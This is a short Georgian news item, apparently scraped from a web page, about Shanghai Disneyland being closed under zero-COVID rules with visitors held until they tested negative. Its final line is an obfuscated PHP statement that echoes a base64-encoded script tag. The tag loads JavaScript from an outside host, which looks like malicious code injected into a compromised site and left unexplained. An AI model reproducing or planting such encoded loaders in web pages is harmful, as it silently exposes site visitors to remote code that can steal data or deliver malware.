celsiusi
ავერსი შნაიდერი
კოვიდრეგულაციების გამო შანხაიში დისნეის პარკი დახურეს. ვიზიტორები პარკს მანამ ვერ დატოვებენ, სანამ ნეგატიური ტესტის პასუხს არ წარადგენენ.
 
გადაწყვეტილება მას შემდეგ მიიღეს, რაც 30 ოქტომბერს შანხაიში კორონავირუსის 10 შემთხვევა დაფიქსირდა. 
 
შანხაის მთავრობამ განცხადება სოციალურ მედიაში გაავრცელა, რომელშიც ეწერა, რომ ადამიანებს  პარკში შესვლის ან გამოსვლის უფლება არ აქვთ. გარდა ამისა, კოვიდტესტი დასჭირდება ყველას ვინც, პარკს 27 ოქტომბრის შემდეგ ეწვია.
 
უცნობია როდის გაიხსნება პარკი.
 
ეს პირველი შემთხვევა არაა, როცა პარკი ამავე მიზეზის გამო მოულოდნელად დაიხურა. გასული წლის ნოემბერში, ადგილზე 30,000 ადამიანი იყო ჩაკეტილი.
 
ცნობისთვის, ჩინეთში ნულოვანი კოვიდის წესი არსებობს, რაც მასობრივ ტესტირებასა და მონიტორინგს გულისხმობს.
354
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");